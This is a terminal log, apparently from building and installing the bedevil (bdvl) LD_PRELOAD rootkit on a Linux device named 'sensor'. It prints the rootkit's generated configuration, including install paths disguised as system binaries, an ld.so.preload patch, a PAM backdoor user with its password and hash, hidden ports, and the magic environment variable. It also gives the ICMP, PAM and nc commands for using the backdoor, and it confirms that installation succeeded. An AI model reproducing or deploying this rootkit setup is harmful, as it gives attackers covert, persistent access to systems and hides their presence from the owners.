root@sensor(rw):~/bdvl# sh etc/depinstall.sh && make
E: Package 'gcc-multilib' has no installation candidate
rm -rf new_inc
python setup.py
MAX_FILE_SIZE: 104857600
MAX_STEAL_SIZE: 838860800
INSTALL_DIR: /lib/initqzmhr
MAGIC_ACK: 50432
PRELOAD_FILE: /etc/mailcapllzfcx
HOMEDIR: /lib/libnih-dbusv
INTEREST_DIR: /bin/touchccuiarj
MAX_GID: 4294967294
CLEANEDTIME_PATH: /bin/netstaf
GID_PATH: /bin/systemd-hi
OLD_PRELOAD: /etc/ld.so.preload
MAGIC_SEQ: 50398
BD_VAR: ERSRNYKOFSFUCUNZ
LOG_FMT: %s (%s)\n
MIN_GID: 134217727
GID_CHANGE_MINTIME: 1800
SSHD_CONFIG: /etc/ssh/sshd_config
MAGIC_GID: 134218061
BLOCKS_COUNT: 10
MAGIC_ID: 45327
PAM_UNAME: super
LOG_PATH: /lib/terminfodx
EXEC_LOGS: /lib/initjifjghcw
BACKDOOR_PASS: $6$C3DffePZRd62s8yC$2stp4KatlA2AXeSFYrIB7C8Ukh.oAuDDsytTcQX76ugylyA1xZJICh4NV.hcU/0M/OWPI2dfxTIm0VFxSuEgJ0
SSH_LOGS: /bin/lesskeyxs
PLAINSOPATH: /lib/initqzmhr/libinitqzmhr.so
HIDEPORTS: /bin/openvtsfqnfq
ASS_PATH: /bin/ping6qhjpya
MAX_BLOCK_SIZE: 32768
GIDTIME_PATH: /bin/netstatymgu
FILE_CLEANSE_TIMER: 28800
BDVLSO: libinitqzmhr.so
SOPATH: /lib/initqzmhr/libinitqzmhr.so.$PLATFORM

Hidden port(s): [10505, 25282]
Magic environment variable: ERSRNYKOFSFUCUNZ

   Password: 1UHenWeW9tIq

   PAM: sh etc/ssh.sh super <host> 10505

   ICMP: sh etc/icmp.sh <host> 10505

   ACCEPT: nc <host> 22 -p 29430

cc -std=gnu99 -g -fPIC -Wall -Inew_inc -shared -Wl,--build-id=none new_inc/bedevil.c -lc -ldl -lcrypt -lpcap -o build/bdvl.so.armv7l
cc -m32 -std=gnu99 -g -fPIC -Wall -Inew_inc -shared -Wl,--build-id=none new_inc/bedevil.c -lc -ldl -lcrypt -lpcap -o build/bdvl.so.i686 2>/dev/null
Makefile:15: recipe for target 'kit' failed
make: [kit] Error 1 (ignored)
strip build/bdvl.so*






root@sensor(rw):~/bdvl# etc/auto.sh build/super.b64
Installing
E: Package 'gcc-multilib' has no installation candidate
Linux version 5.4.83-v7l+ (dom@buildbot) (gcc version 8.4.0 (Ubuntu/Linaro 8.4.0-3ubuntu1)) #1379 SMP Mon Dec 14 13:11:54 GMT 2020

                     ▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
                    ▓▓▓▓▓▓
               ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
               ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
               ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
          ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
          ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
           ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
              ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
                ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
                  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
                  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
                  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓


Moby Dork is mine!
No SELinux.
Creating installation directory.
Copied: libinitqzmhr.so.v7l
Patching dynamic linker.
Patched ld.so: 1
Installed.

ICMP backdoor up.
PAM username: super
Accept backdoor port:
  29430
Hidden port(s):
  10505, 25282

Unhappy with something?:
  ERSRNYKOFSFUCUNZ=1 sh -c './bdv uninstall'

